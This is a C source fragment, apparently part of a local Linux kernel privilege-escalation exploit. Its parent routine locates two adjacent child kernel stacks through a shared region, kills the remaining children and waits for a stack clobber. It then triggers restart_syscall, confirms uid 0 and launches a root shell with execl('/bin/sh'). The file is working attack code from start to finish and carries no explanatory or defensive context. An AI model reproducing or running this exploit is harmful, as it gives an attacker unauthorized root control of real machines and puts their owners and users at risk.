
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {scalar_t__* addrs; scalar_t__ parent; } ;


 scalar_t__ KSTACK_CLOBBER ;
 scalar_t__ KSTACK_DIE ;
 scalar_t__ KSTACK_LOWER ;
 scalar_t__ KSTACK_SIZE ;
 scalar_t__ KSTACK_UNINIT ;
 scalar_t__ KSTACK_UPPER ;
 int NPROC ;
 int __NR_restart_syscall ;
 int execl (char*,char*,int *) ;
 int exit (int) ;
 scalar_t__ getuid () ;
 int printf (char*,...) ;
 TYPE_1__* region ;
 int sleep (int) ;
 int syscall (int ) ;

void
do_parent(void)
{
 int i, j, upper, lower;


 while (1) {
  sleep(1);
  for (i = 0; i < NPROC; ++i) {
   if (region->addrs[i] == KSTACK_UNINIT) {
    break;
   }
  }
  if (i == NPROC) {
   break;
  }
 }


 for (i = 0; i < NPROC; ++i) {
  for (j = 0; j < NPROC; ++j) {
   if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
    break;
   }
  }
  if (j != NPROC) {
   break;
  }
 }
 if (i == NPROC && j == NPROC) {
  printf("[-] failed to find adjacent kstacks, try again!\n");
  exit(1);
 }

 upper = i;
 lower = j;

 printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]);


 for (i = 0; i < NPROC; ++i) {
  if (i != upper && i != lower) {
   region->addrs[i] = KSTACK_DIE;
  }
 }


 region->addrs[upper] = KSTACK_UPPER;
 region->addrs[lower] = KSTACK_LOWER;


 while (1) {
  sleep(1);
  if (region->parent == KSTACK_CLOBBER) {
   break;
  }
 }

 printf("[+] escalating privileges...\n");


 syscall(__NR_restart_syscall);


 if (getuid() != 0) {
  printf("[-] privilege escalation failed, aborting!\n");
  exit(1);
 }

 printf("[+] launching root shell!\n");

 execl("/bin/sh", "/bin/sh", ((void*)0));
}
